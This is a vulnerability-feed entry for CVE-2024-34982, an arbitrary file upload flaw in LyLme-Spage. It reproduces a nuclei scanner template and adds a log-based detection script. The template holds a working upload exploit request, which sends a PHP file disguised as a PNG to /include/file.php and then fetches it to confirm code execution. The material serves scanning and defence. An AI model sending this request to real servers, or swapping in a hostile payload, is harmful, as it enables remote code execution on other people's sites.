nuclei | ProjectDiscovery | NUCLEI:CVE-2024-34982
Jun 18, 2024 - 7:04 a.m.

LyLme-Spage - Arbitrary File Upload

2024-06-18 07:04:32
ProjectDiscovery
github.com
Tags: lylme-spage, arbitrary file upload, cve2024, rce, www, file upload vulnerability

CVSS3: 9.8
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score: 7.7
Confidence: High

An arbitrary file upload vulnerability in the component /include/file.php of lylme_spage v1.9.5 allows attackers to execute arbitrary code via uploading a crafted file.

id: CVE-2024-34982

info:
  name: LyLme-Spage - Arbitary File Upload
  author: DhiyaneshDk
  severity: high
  description: |
    An arbitrary file upload vulnerability in the component /include/file.php of lylme_spage v1.9.5 allows attackers to execute arbitrary code via uploading a crafted file.
  reference:
    - https://github.com/n2ryx/CVE/blob/main/Lylme_pagev1.9.5.md
    - https://github.com/tanjiti/sec_profile
    - https://github.com/ATonysan/poc-exp/blob/main/60NavigationPage_CVE-2024-34982_ArbitraryFileUploads.py
  metadata:
    verified: true
    max-request: 1
    fofa-query: icon_hash="-282504889"
  tags: cve,cve2024,lylme-spage,rce,intrusive

flow: http(1) && http(2)

variables:
  string: "{{randstr}}"
  filename: "{{to_lower(rand_text_alpha(5))}}"

http:
  - raw:
      - |
        POST /include/file.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=---------------------------575673989461736

        -----------------------------575673989461736
        Content-Disposition: form-data; name="file"; filename="{{filename}}.php"
        Content-Type: image/png

        <?php echo "{{string}}";unlink(__FILE__);?>
        -----------------------------575673989461736--

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"code":'
          - '"msg":'
          - 'php"}'
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: path
        part: body
        group: 1
        regex:
          - '"url":"([/a-z_0-9.]+)"'
        internal: true

  - raw:
      - |
        GET {{path}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "{{string}}" )'
          - 'contains(header, "text/html")'
        condition: and
# digest: 4a0a004730450220440784f1e1d309bfb1eee99fbcaf02afe7bfa185b48f07233df0f14cac9e9d9b0221009072b53098bb58d0d3efd14db1a3fc5f7b0b4593a0426fa060db0c42edd6f029:922c64590222798bb761d5b6d8e72950
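
The template's two-step flow (a POST to /include/file.php, then a GET of the returned .php path) leaves a recognisable pair in web access logs even though the probe file deletes itself with unlink(__FILE__). The following detection sketch is an added example, not part of the ProjectDiscovery template; the combined log format, the 60-second window, the /files/upload/ path and the sample lines are assumptions constructed for illustration.

```python
import re
from datetime import datetime, timedelta

UPLOAD_ENDPOINT = "/include/file.php"  # vulnerable component named on the page

# Constructed sample access-log lines (not real traffic). The upload
# directory /files/upload/ is a placeholder; the page does not state it.
SAMPLE_LOG = """\
203.0.113.7 - - [18/Jun/2024:07:04:30 +0000] "GET /index.php HTTP/1.1" 200 5120
203.0.113.7 - - [18/Jun/2024:07:04:32 +0000] "POST /include/file.php HTTP/1.1" 200 96
203.0.113.7 - - [18/Jun/2024:07:04:33 +0000] "GET /files/upload/abcde.php HTTP/1.1" 200 10
203.0.113.7 - - [18/Jun/2024:07:04:40 +0000] "GET /index.php HTTP/1.1" 200 5120
198.51.100.9 - - [18/Jun/2024:07:05:00 +0000] "POST /include/file.php HTTP/1.1" 200 101
198.51.100.9 - - [18/Jun/2024:07:05:02 +0000] "GET /files/upload/logo.png HTTP/1.1" 200 2048
"""

LINE = re.compile(r'(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

def find_upload_then_execute(log_text, window=timedelta(seconds=60)):
    """Flag a first-ever GET of a .php path made by a client shortly
    after that client's successful POST to the upload endpoint."""
    uploads = {}       # client IP -> time of its last 200 POST to the endpoint
    known_php = set()  # .php paths already requested earlier in the log
    hits = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        ip, ts, method, target, status = m.groups()
        when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
        path = target.split("?", 1)[0]
        if method == "POST" and path == UPLOAD_ENDPOINT and status == "200":
            uploads[ip] = when
            continue
        if method == "GET" and path.lower().endswith(".php"):
            first_seen = path not in known_php
            known_php.add(path)
            uploaded_at = uploads.get(ip)
            # Established pages such as /index.php are skipped: only a script
            # that nobody requested before the upload is suspicious.
            if first_seen and uploaded_at and when - uploaded_at <= window:
                hits.append((ip, path, ts))
    return hits

if __name__ == "__main__":
    for hit in find_upload_then_execute(SAMPLE_LOG):
        print("upload followed by new .php request:", hit)
```

Because the probe removes its own file, a later disk scan of the upload directory can come back clean; the access log is the more durable evidence.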